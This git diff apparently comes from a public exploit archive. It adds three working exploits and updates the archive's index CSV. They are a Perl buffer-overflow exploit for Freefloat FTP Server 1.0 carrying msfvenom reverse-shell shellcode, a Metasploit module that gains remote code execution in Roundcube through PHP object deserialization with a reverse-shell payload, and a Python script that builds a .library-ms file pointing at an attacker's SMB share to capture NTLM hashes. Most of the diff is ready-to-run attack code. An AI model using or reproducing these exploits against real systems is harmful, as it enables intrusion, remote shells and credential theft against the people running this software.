diff --git a/exploits/multiple/remote/52323.txt b/exploits/multiple/remote/52323.txt new file mode 100644 index 000000000..ecc2410e9 --- /dev/null +++ b/exploits/multiple/remote/52323.txt @@ -0,0 +1,85 @@ +# Exploit Title: Freefloat FTP Server 1.0 - Remote Buffer Overflow +# Date: 22 may 2025 +# Notification vendor: No reported +# Discovery by: Fernando Mengali +# LinkedIn: https://www.linkedin.com/in/fernando-mengali-273504142/ +# Version: 1.0 +# Tested on: Windows XP SP3 English - # Version 5.1 (Build 2600.xpsp.080413-2111 : Service Pack 3) +# Vulnerability Type: Remote Buffer Overflow +# CVE: CVE-2025-5548 + +#offset: 246 + +#badchars: \x00\x0a\x0d + +#EIP: 0x7C86467B (JMP ESP) +#Kernel32.dll + +use IO::Socket::INET; + +# msfvenom -p windows/shell_reverse_tcp lhost=192.168.232.129 lport=4444 EXITFUNC=thread -b '\x00\x0a\x0d' -a x86 --platform Windows -f perl +# nc -vlp 4444 +# execute exploit + +my $buf = +"\xda\xd4\xbb\x4e\xd9\xfd\x96\xd9\x74\x24\xf4\x58\x2b\xc9" . +"\xb1\x52\x31\x58\x17\x83\xc0\x04\x03\x16\xca\x1f\x63\x5a" . +"\x04\x5d\x8c\xa2\xd5\x02\x04\x47\xe4\x02\x72\x0c\x57\xb3" . +"\xf0\x40\x54\x38\x54\x70\xef\x4c\x71\x77\x58\xfa\xa7\xb6" . +"\x59\x57\x9b\xd9\xd9\xaa\xc8\x39\xe3\x64\x1d\x38\x24\x98" . +"\xec\x68\xfd\xd6\x43\x9c\x8a\xa3\x5f\x17\xc0\x22\xd8\xc4" . +"\x91\x45\xc9\x5b\xa9\x1f\xc9\x5a\x7e\x14\x40\x44\x63\x11" . +"\x1a\xff\x57\xed\x9d\x29\xa6\x0e\x31\x14\x06\xfd\x4b\x51" . +"\xa1\x1e\x3e\xab\xd1\xa3\x39\x68\xab\x7f\xcf\x6a\x0b\x0b" . +"\x77\x56\xad\xd8\xee\x1d\xa1\x95\x65\x79\xa6\x28\xa9\xf2" . +"\xd2\xa1\x4c\xd4\x52\xf1\x6a\xf0\x3f\xa1\x13\xa1\xe5\x04" . +"\x2b\xb1\x45\xf8\x89\xba\x68\xed\xa3\xe1\xe4\xc2\x89\x19" . +"\xf5\x4c\x99\x6a\xc7\xd3\x31\xe4\x6b\x9b\x9f\xf3\x8c\xb6" . +"\x58\x6b\x73\x39\x99\xa2\xb0\x6d\xc9\xdc\x11\x0e\x82\x1c" . +"\x9d\xdb\x05\x4c\x31\xb4\xe5\x3c\xf1\x64\x8e\x56\xfe\x5b" . +"\xae\x59\xd4\xf3\x45\xa0\xbf\x3b\x31\x42\xbe\xd4\x40\x92" . +"\xd0\x78\xcc\x74\xb8\x90\x98\x2f\x55\x08\x81\xbb\xc4\xd5" . +"\x1f\xc6\xc7\x5e\xac\x37\x89\x96\xd9\x2b\x7e\x57\x94\x11" . +"\x29\x68\x02\x3d\xb5\xfb\xc9\xbd\xb0\xe7\x45\xea\x95\xd6" . +"\x9f\x7e\x08\x40\x36\x9c\xd1\x14\x71\x24\x0e\xe5\x7c\xa5" . +"\xc3\x51\x5b\xb5\x1d\x59\xe7\xe1\xf1\x0c\xb1\x5f\xb4\xe6" . +"\x73\x09\x6e\x54\xda\xdd\xf7\x84\x1f\xd2\x90\x6e\x70\xeb" . +"\x82\x52\x75\x11\x7b\x02\x0c\x9f\x7b\x6c\x48\x37\x2a\x59" . +"\x07\x94\x51\xcc\xde\xc5\x30\x84\x22\x97\x58\x0e\x12\x72" . +"\x5a\x1a\x4b\x9a\x5a\x7c\x4e\x04\x2e\x14\x48\xbc\x67\x9b" . +"\x9d\x6c\xa9\x79\x0f\x4f\x08\xbd\x2e\xec\xaa\x45\x64\x09" . +"\xe2\x98\x56\x62\xde\x65\xf2\x48\x4e\xec\x79\x1b\x4c\x9d" . +"\xa5\xda\x47\xd3\xa5\x53\xa3\xaa\x52\x11\x25\xdb\x6a\x62" . +"\xc3\x5a\x3a\x90\xab\x70\x4e\x74\x4a\x12\xae\x53\x54\xda" . +"\x38\x90\x70\x58\x98\xac\x2b\xdb\x7c\x48\x5f\x1e\x4a\x4a" . +"\x1e\x84\x28"; + +my $offset = 246; # Será substituído depois +my $eip = pack('V', 0x7c86467b); # Endereço JMP ESP little endian +my $nop = "\x90" x 20; + +my $padding = "A" x $offset; +my $payload = $padding . $eip . $nop . $buf; + +my $socket = IO::Socket::INET->new( + PeerAddr => '192.168.232.135', + PeerPort => '21', + Proto => 'tcp' +) or die "Failed to connect: $!\n"; + +print "Connected to FTP server\n"; + +my $response = ""; +$response = <$socket>; # banner inicial do FTP + +print $socket "USER anonymous\r\n"; +$response = <$socket>; +print $socket "PASS anonymous\r\n"; +$response = <$socket>; + +print $socket "NOOP $payload\r\n"; +$response = <$socket>; + +print "Payload sent, check your listener.\n"; + +close $socket; \ No newline at end of file diff --git a/exploits/multiple/webapps/52324.NA b/exploits/multiple/webapps/52324.NA new file mode 100644 index 000000000..f992624a5 --- /dev/null +++ b/exploits/multiple/webapps/52324.NA @@ -0,0 +1,238 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + include Msf::Exploit::CmdStager + prepend Msf::Exploit::Remote::AutoCheck + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Roundcube ≤ 1.6.10 Post-Auth RCE via PHP Object Deserialization', + 'Description' => %q{ + Roundcube Webmail before 1.5.10 and 1.6.x before 1.6.11 allows remote code execution + by authenticated users because the _from parameter in a URL is not validated + in program/actions/settings/upload.php, leading to PHP Object Deserialization. + + An attacker can execute arbitrary system commands as the web server. + }, + 'Author' => [ + 'Maksim Rogov', # msf module + 'Kirill Firsov', # disclosure and original exploit + ], + 'License' => MSF_LICENSE, + 'References' => [ + ['CVE', '2025-49113'], + ['URL', 'https://fearsoff.org/research/roundcube'] + ], + 'DisclosureDate' => '2025-06-02', + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [IOC_IN_LOGS], + 'Reliability' => [REPEATABLE_SESSION] + }, + 'Platform' => ['unix', 'linux'], + 'Targets' => [ + [ + 'Linux Dropper', + { + 'Platform' => 'linux', + 'Arch' => [ARCH_X64, ARCH_X86, ARCH_ARMLE, ARCH_AARCH64], + 'Type' => :linux_dropper, + 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } + } + ], + [ + 'Linux Command', + { + 'Platform' => ['unix', 'linux'], + 'Arch' => [ARCH_CMD], + 'Type' => :nix_cmd, + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } + } + ] + ], + 'DefaultTarget' => 0 + ) + ) + + register_options( + [ + OptString.new('USERNAME', [true, 'Email User to login with', '' ]), + OptString.new('PASSWORD', [true, 'Password to login with', '' ]), + OptString.new('TARGETURI', [true, 'The URI of the Roundcube Application', '/' ]), + OptString.new('HOST', [false, 'The hostname of Roundcube server', '']) + ] + ) + end + + class PhpPayloadBuilder + def initialize(command) + @encoded = Rex::Text.encode_base32(command) + @gpgconf = %(echo "#{@encoded}"|base32 -d|sh &#) + end + + def build + len = @gpgconf.bytesize + %(|O:16:"Crypt_GPG_Engine":3:{s:8:"_process";b:0;s:8:"_gpgconf";s:#{len}:"#{@gpgconf}";s:8:"_homedir";s:0:"";};) + end + end + + def fetch_login_page + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path), + 'method' => 'GET', + 'keep_cookies' => true, + 'vars_get' => { '_task' => 'login' } + ) + + fail_with(Failure::Unreachable, "#{peer} - No response from web service") unless res + fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP code #{res.code}") unless res.code == 200 + res + end + + def check + res = fetch_login_page + + unless res.body =~ /"rcversion"\s*:\s*(\d+)/ + fail_with(Failure::UnexpectedReply, "#{peer} - Unable to extract version number") + end + + version = Rex::Version.new(Regexp.last_match(1).to_s) + print_good("Extracted version: #{version}") + + if version.between?(Rex::Version.new(10100), Rex::Version.new(10509)) + return CheckCode::Appears + elsif version.between?(Rex::Version.new(10600), Rex::Version.new(10610)) + return CheckCode::Appears + end + + CheckCode::Safe + end + + def build_serialized_payload + print_status('Preparing payload...') + + stager = case target['Type'] + when :nix_cmd + payload.encoded + when :linux_dropper + generate_cmdstager.join(';') + else + fail_with(Failure::BadConfig, 'Unsupported target type') + end + + serialized = PhpPayloadBuilder.new(stager).build.gsub('"', '\\"') + print_good('Payload successfully generated and serialized.') + serialized + end + + def exploit + token = fetch_csrf_token + login(token) + + payload_serialized = build_serialized_payload + upload_payload(payload_serialized) + end + + def fetch_csrf_token + print_status('Fetching CSRF token...') + + res = fetch_login_page + html = res.get_html_document + + token_input = html.at('input[name="_token"]') + unless token_input + fail_with(Failure::UnexpectedReply, "#{peer} - Unable to extract CSRF token") + end + + token = token_input.attributes.fetch('value', nil) + if token.blank? + fail_with(Failure::UnexpectedReply, "#{peer} - CSRF token is empty") + end + + print_good("Extracted token: #{token}") + token + end + + def login(token) + print_status('Attempting login...') + vars_post = { + '_token' => token, + '_task' => 'login', + '_action' => 'login', + '_url' => '_task=login', + '_user' => datastore['USERNAME'], + '_pass' => datastore['PASSWORD'] + } + + vars_post['_host'] = datastore['HOST'] if datastore['HOST'] + + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path), + 'method' => 'POST', + 'keep_cookies' => true, + 'vars_post' => vars_post, + 'vars_get' => { '_task' => 'login' } + ) + + fail_with(Failure::Unreachable, "#{peer} - No response during login") unless res + fail_with(Failure::UnexpectedReply, "#{peer} - Login failed (code #{res.code})") unless res.code == 302 + + print_good('Login successful.') + end + + def generate_from + options = [ + 'compose', + 'reply', + 'import', + 'settings', + 'folders', + 'identity' + ] + options.sample + end + + def generate_id + random_data = SecureRandom.random_bytes(8) + timestamp = Time.now.to_f.to_s + Digest::MD5.hexdigest(random_data + timestamp) + end + + def generate_uploadid + millis = (Time.now.to_f * 1000).to_i + "upload#{millis}" + end + + def upload_payload(payload_filename) + print_status('Uploading malicious payload...') + + # 1x1 transparent pixel image + png_data = Rex::Text.decode_base64('iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAACklEQVR4nGMAAQAABQABDQottAAAAABJRU5ErkJggg==') + boundary = Rex::Text.rand_text_alphanumeric(8) + + data = '' + data << "--#{boundary}\r\n" + data << "Content-Disposition: form-data; name=\"_file[]\"; filename=\"#{payload_filename}\"\r\n" + data << "Content-Type: image/png\r\n\r\n" + data << png_data + data << "\r\n--#{boundary}--\r\n" + + send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, "?_task=settings&_remote=1&_from=edit-!#{generate_from}&_id=#{generate_id}&_uploadid=#{generate_uploadid}&_action=upload"), + 'ctype' => "multipart/form-data; boundary=#{boundary}", + 'data' => data + }) + + print_good('Exploit attempt complete. Check for session.') + end +end \ No newline at end of file diff --git a/exploits/windows/remote/26471.py b/exploits/windows/remote/26471.NA old mode 100755 new mode 100644 similarity index 100% rename from exploits/windows/remote/26471.py rename to exploits/windows/remote/26471.NA diff --git a/exploits/windows/remote/52325.py b/exploits/windows/remote/52325.py new file mode 100755 index 000000000..8fee744b4 --- /dev/null +++ b/exploits/windows/remote/52325.py @@ -0,0 +1,34 @@ +import os +import tarfile + +def main(): + file_name = input("Enter your file name: ") + ip_address = input("Enter IP (EX: 192.168.1.162): ") + + library_content = f""" + + + + + \\\\{ip_address}\\IT + + + + +""" + + library_file_name = f"{file_name}.library-ms" + with open(library_file_name, "w", encoding="utf-8") as f: + f.write(library_content) + + tar_name = "exploit.tar" + with tarfile.open(tar_name, "w") as tarf: + tarf.add(library_file_name) + + if os.path.exists(library_file_name): + os.remove(library_file_name) + + print("completed") + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 8f25a4a54..24225c382 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10942,6 +10942,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 36013,exploits/multiple/remote/36013.txt,"foomatic-gui python-foomatic 0.7.9.4 - 'pysmb.py' Arbitrary Shell Command Execution",2011-08-03,daveb,remote,multiple,,2011-08-03,2015-02-07,1,,,,,,https://www.securityfocus.com/bid/48982/info 39222,exploits/multiple/remote/39222.txt,"Foreman Smart-Proxy - Remote Command Injection",2014-06-05,"Lukas Zapletal",remote,multiple,,2014-06-05,2016-01-11,1,CVE-2014-0007;OSVDB-108277,,,,,https://www.securityfocus.com/bid/68117/info 52308,exploits/multiple/remote/52308.py,"Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass",2025-05-29,İbrahimsql,remote,multiple,,2025-05-29,2025-05-29,0,CVE-2024-0204,,,,, +52323,exploits/multiple/remote/52323.txt,"Freefloat FTP Server 1.0 - Remote Buffer Overflow",2025-06-13,"Fernando Mengali",remote,multiple,,2025-06-13,2025-06-13,0,CVE-2025-5548,,,,, 23707,exploits/multiple/remote/23707.txt,"Freeform Interactive Purge 1.4.7/Purge Jihad 2.0.1 Game Client - Remote Buffer Overflow",2004-02-16,"Luigi Auriemma",remote,multiple,,2004-02-16,2012-12-31,1,CVE-2004-0290;OSVDB-3982,,,,,https://www.securityfocus.com/bid/9671/info 29873,exploits/multiple/remote/29873.php,"FreePBX 2.2 - SIP Packet Multiple HTML Injection Vulnerabilities",2007-04-20,XenoMuta,remote,multiple,,2007-04-20,2013-11-28,1,CVE-2007-2191;OSVDB-35315,,,,,https://www.securityfocus.com/bid/23575/info 47698,exploits/multiple/remote/47698.rb,"FreeSWITCH - Event Socket Command Execution (Metasploit)",2019-11-20,Metasploit,remote,multiple,,2019-11-20,2019-11-20,1,,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/misc/freeswitch_event_socket_cmd_exec.rb @@ -12341,6 +12342,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 46992,exploits/multiple/webapps/46992.py,"RedwoodHQ 2.5.5 - Authentication Bypass",2019-06-17,EthicalHCOP,webapps,multiple,,2019-06-17,2019-06-17,0,,"Authentication Bypass / Credentials Bypass (AB/CB)",,,, 52081,exploits/multiple/webapps/52081.txt,"reNgine 2.2.0 - Command Injection (Authenticated)",2024-10-01,"Caner Tercan",webapps,multiple,,2024-10-01,2024-10-01,0,,,,,, 18553,exploits/multiple/webapps/18553.txt,"Rivettracker 1.03 - Multiple SQL Injections",2012-03-03,"Ali Raheem",webapps,multiple,,2012-03-03,2012-03-16,0,OSVDB-85702;OSVDB-79806;CVE-2012-4996;CVE-2012-4993;OSVDB-79805,,,,http://www.exploit-db.comrivettracker_1-03.zip, +52324,exploits/multiple/webapps/52324.NA,"Roundcube 1.6.10 - Remote Code Execution (RCE)",2025-06-13,"Maksim Rogov",webapps,multiple,,2025-06-13,2025-06-13,0,CVE-2025-49113,,,,, 52127,exploits/multiple/webapps/52127.py,"Royal Elementor Addons and Templates 1.3.78 - Unauthenticated Arbitrary File Upload",2025-04-05,4m3rr0r,webapps,multiple,,2025-04-05,2025-04-05,0,CVE-2023-5360,,,,, 11405,exploits/multiple/webapps/11405.txt,"RSA - SecurID Cross-Site Scripting",2010-02-11,s4squatch,webapps,multiple,80,2010-02-10,,1,OSVDB-43844;CVE-2008-1470,,,,, 48639,exploits/multiple/webapps/48639.txt,"RSA IG&L Aveksa 7.1.1 - Remote Code Execution",2020-07-06,"Jakub Palaczynski",webapps,multiple,,2020-07-06,2020-07-06,0,CVE-2019-3759,,,,, @@ -14236,7 +14238,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 9636,exploits/php/webapps/9636.txt,"An image Gallery 1.0 - 'navigation.php' Local Directory Traversal",2009-09-10,"ThE g0bL!N",webapps,php,,2009-09-09,,1,OSVDB-57945;CVE-2009-3367;OSVDB-57944;CVE-2009-3366;OSVDB-57943,,,,, 5824,exploits/php/webapps/5824.txt,"Anata CMS 1.0b5 - 'change.php' Arbitrary Add Admin",2008-06-15,"CWH Underground",webapps,php,,2008-06-14,2016-12-09,1,OSVDB-53697;CVE-2008-6665,,,,http://www.exploit-db.comAnanta10b5.zip, 48832,exploits/php/webapps/48832.txt,"Anchor CMS 0.12.7 - Persistent Cross-Site Scripting (Authenticated)",2020-09-25,"Sinem Şahin",webapps,php,,2020-09-25,2020-09-25,0,,,,,, -52147,exploits/php/webapps/52147.NA,"Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)",2025-04-09,"Ahmet Ümit BAYRAM",webapps,php,,2025-04-09,2025-04-09,0,CVE-2024-37732,,,,, +52147,exploits/php/webapps/52147.NA,"Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)",2025-04-09,"Ahmet Ümit BAYRAM",webapps,php,,2025-04-09,2025-06-13,0,CVE-2024-37732,,,,, 37096,exploits/php/webapps/37096.html,"Anchor CMS 0.6-14-ga85d0a0 - 'id' Multiple HTML Injection Vulnerabilities",2012-04-20,"Gjoko Krstic",webapps,php,,2012-04-20,2015-05-24,1,,,,,,https://www.securityfocus.com/bid/53181/info 26958,exploits/php/webapps/26958.txt,"Anchor CMS 0.9.1 - Persistent Cross-Site Scripting",2013-07-18,DURAKIBOX,webapps,php,,2013-07-18,2013-07-21,1,OSVDB-95568;CVE-2013-5099,,,,http://www.exploit-db.comanchor-cms-0.9.1.zip, 27138,exploits/php/webapps/27138.txt,"AndoNET Blog 2004.9.2 - 'Comentarios.php' SQL Injection",2006-01-26,"Aliaksandr Hartsuyeu",webapps,php,,2006-01-26,2013-07-28,1,CVE-2006-0462;OSVDB-22755,,,,,https://www.securityfocus.com/bid/16393/info @@ -45191,7 +45193,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 40680,exploits/windows/remote/40680.py,"PCMan FTP Server 2.0.7 - 'UMASK' Remote Buffer Overflow",2016-11-02,Eagleblack,remote,windows,,2016-11-02,2016-11-02,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2016-11-02-at-135629.png,http://www.exploit-db.comPCMan.7z, 38340,exploits/windows/remote/38340.py,"PCMan FTP Server 2.0.7 - Directory Traversal",2015-09-28,"Jay Turla",remote,windows,21,2015-09-28,2015-09-28,0,CVE-2015-7601;OSVDB-128191,,,,http://www.exploit-db.comPCMan.7z, 27007,exploits/windows/remote/27007.rb,"PCMan FTP Server 2.0.7 - Remote (Metasploit)",2013-07-22,MSJ,remote,windows,21,2013-07-22,2013-07-22,1,OSVDB-94624;CVE-2013-4730,"Metasploit Framework (MSF)",,,http://www.exploit-db.comPCMan.7z, -26471,exploits/windows/remote/26471.py,"PCMan FTP Server 2.0.7 - Remote Buffer Overflow",2013-06-27,"Jacob Holcomb",remote,windows,21,2013-06-27,2013-06-29,1,OSVDB-94624;CVE-2013-4730,,,,http://www.exploit-db.comPCMan.7z, +26471,exploits/windows/remote/26471.NA,"PCMan FTP Server 2.0.7 - Remote Buffer Overflow",2013-06-27,"Jacob Holcomb",remote,windows,21,2013-06-27,2025-06-13,0,OSVDB-94624;CVE-2013-4730,,,,http://www.exploit-db.comPCMan.7z, 31254,exploits/windows/remote/31254.py,"PCMan FTP Server 2.07 - 'ABOR' Remote Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",remote,windows,21,2014-01-29,2016-10-31,1,OSVDB-94624;CVE-2013-4730,,,,http://www.exploit-db.comPCMan.7z, 31255,exploits/windows/remote/31255.py,"PCMan FTP Server 2.07 - 'CWD' Remote Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",remote,windows,21,2014-01-29,2016-10-31,1,OSVDB-94624;CVE-2013-4730,,,,http://www.exploit-db.comPCMan.7z, 27277,exploits/windows/remote/27277.py,"PCMan FTP Server 2.07 - 'PASS' Remote Buffer Overflow",2013-08-02,Ottomatik,remote,windows,,2013-08-02,2016-10-31,1,OSVDB-94624;CVE-2013-4730,,,http://www.exploit-db.com/screenshots/idlt27500/screen-shot-2013-08-08-at-34942-pm.png,http://www.exploit-db.comPCMan.7z, @@ -45956,6 +45958,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 16335,exploits/windows/remote/16335.rb,"WinComLPD 3.0.2 - Remote Buffer Overflow (Metasploit)",2010-06-22,Metasploit,remote,windows,,2010-06-22,2011-03-06,1,CVE-2008-5159;OSVDB-42861,"Metasploit Framework (MSF)",,,, 51575,exploits/windows/remote/51575.txt,"Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution",2023-07-07,nu11secur1ty,remote,windows,,2023-07-07,2023-07-07,0,CVE-2022-21907,,,,, 52300,exploits/windows/remote/52300.py,"Windows 2024.15 - Unauthenticated Desktop Screenshot Capture",2025-05-25,"Chokri Hammedi",remote,windows,,2025-05-25,2025-05-25,0,CVE-n/a,,,,, +52325,exploits/windows/remote/52325.py,"Windows File Explorer Windows 10 Pro x64 - TAR Extraction",2025-06-13,"Daniel Miranda",remote,windows,,2025-06-13,2025-06-13,0,CVE-2025-24071,,,,, 52310,exploits/windows/remote/52310.py,"Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure",2025-05-29,"Mohammed Idrees Banyamer",remote,windows,,2025-05-29,2025-05-29,0,CVE-2025-24071,,,,, 30169,exploits/windows/remote/30169.txt,"WindowsPT 1.2 - User ID Key Spoofing",2007-06-11,nnposter,remote,windows,,2007-06-11,2013-12-10,1,CVE-2007-3201;OSVDB-41727,,,,,https://www.securityfocus.com/bid/24412/info 16529,exploits/windows/remote/16529.rb,"WinDVD7 - 'IASystemInfo.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,,2010-05-09,2011-03-10,1,CVE-2007-0348;OSVDB-34315,"Metasploit Framework (MSF)",,,,